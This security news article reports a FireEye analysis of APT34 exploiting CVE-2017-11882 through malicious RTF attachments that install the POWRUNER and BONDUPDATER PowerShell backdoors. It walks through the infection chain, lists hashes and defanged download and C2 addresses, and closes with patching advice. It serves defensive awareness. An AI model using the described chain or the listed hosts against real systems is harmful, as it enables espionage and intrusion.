Post Now

New Targeted Attack in Middle East By Exploiting CVE-2017-11882 Microsoft Vulnerability

Image

Researchers discovered that hackers are exploiting Microsoft vulnerability  CVE-2017-11882 to target Middle East organizations.

Researchers discovered that hackers are exploiting Microsoft vulnerability  CVE-2017-11882 to target Middle East organizations.Researchers from FireEye who observed it first in early July said that they suspect Iranian cyber espionage group APT 34 is behind the attack and are using custom Powershell backdoors for the attack.

Read more on: MuddyWater: Hackers Target Middle East Nations
The  CVE-2017-11882 vulnerability which allows a remote user to run arbitrary code in the context of the current user as a result of improperly handling objects in memory. A patch was released for the vulnerability by Microsoft on November 14th.Here the attackers are using the vulnerability to deliver POWRUNER and BONDUPDATER to the systems.How the attack works:
  1. The attacker will sent a spear phishing mail containing a malicious .rtf file (MD5: a0e6933f4e0497269620f44a083b2ed4) as attachment.
  2. The malicious file exploits the  CVE-2017-11882 vulnerability and overwrites the function address with an existing instruction from EQNEDT32.EXE.
  3. Creates a child process  “mshta.exe,” which will download a file named b.txt from: hxxp://mumbai-m[.]site/b.txt.
  4. The b.txt file contains a PowerShell command which renames v.txt to v.vbs and execute the script
  5. It also download a dropper from: hxxp://dns-update[.]club/v.txt
  6. The v.vbs script adds four components to (hUpdateCheckers.base, dUpdateCheckers.base, cUpdateCheckers.bat, and GoogleUpdateschecker.vbs) to the directory: C:ProgramDataWindowsMicrosoftjava
  7. V.vbs decode the base64-encoded files hUpdateCheckers.base and dUpdateCheckers.base using CertUtil.exe which is a legitimate Microsoft command-line program installed as part of Certificate Services.
  8. V.vbs also drops hUpdateCheckers.ps1 and dUpdateCheckers.ps1 to the staging directory
  9. The malware launches  cUpdateCheckers.bat and creates a scheduled task for GoogleUpdateschecker.vbs persistence.
  10. GoogleUpdateschecker.vbs is executed, and cUpdateCheckers.bat and *.base are deleted from the staging directory
  11. The scheduled task launch GoogleUpdateschecker.vbs every minute and execute  the dUpdateCheckers.ps1 and hUpdateCheckers.ps1 scripts
  These PowerShell scripts which are the final stage payload includes a downloader with domain generation algorithm (DGA) functionality and the backdoor component which is used to connect to the C2 server to perform additional operations and instructions.Here the backdoor component POWRUNER is used to send and receive commands from the C2 server. It is executed every minute by the task scheduler.
Read more on: Vulnerability in TeamViewer allows Attacker to Gain Full Control over the System
POWRUNER sends a random GET request to the C2 server and server will respond back either with a  random 11-digit number or “not_now” command. If the response is a random 11 digit number, then it will again send GET request to the server and store the response in the string.POWRUNER performs an action based on the last digit of the stored random number response. Below given is command and actions to be executed for each value:After the execution, the POWRUNER send the result to C2 server and stops the execution. The POWRUNER is also capable of taking screenshots and sending it to the server back.The BONDUPDATER script is used to generate subdomains for communication with C2 server by using a custom DGA algorithm.According to researchers the malware also collects host information from the system like the hostname, currently logged in user, network configuration data, active connections, process information, local and domain administrator accounts, an enumeration of user directories, and other data.
Read more on: How to Achieve Effective Information Security with a Holistic Approach ?
“APT34 has used POWRUNER and BONDUPDATER to target Middle East organizations as early as July 2017. In July 2017, a FireEye Web MPS appliance detected and blocked a request to retrieve and install an APT34 POWRUNER / BONDUPDATER downloader file. During the same month, FireEye observed APT34 target a separate Middle East organization using a malicious .rtf file (MD5: 63D66D99E46FB93676A4F475A65566D8) that exploited CVE-2017-0199. This file issued a GET request to download a malicious file from hxxp://94.23.172.164/dupdatechecker.doc.” said in the blog post published by Fireye.

Always follow these Basic Instructions to Prevent Yourself From this type of attacks  :

  1. Keep the operating system and third-party applications (MS office, flash player, browsers, browser Plugins) up-to-date with the latest patches. In this case, update your PC with  CVE-2017-11882 vulnerability patch released.
  2. Perform regular backups. Ideally, this data should be kept on a separate device, and backups should be stored offline.
  3. Maintain updated Antivirus software on all systems.
  4. Don’t open attachments in unsolicited e-mails, even if they come from people in your contact list, and never click on a URL contained in an unsolicited email, even if the link seems benign. In cases of genuine URLs close out the e-mail and go to the organization’s website directly through the browser.
Read more on: 10 Key Steps to Your Dream Information Security Job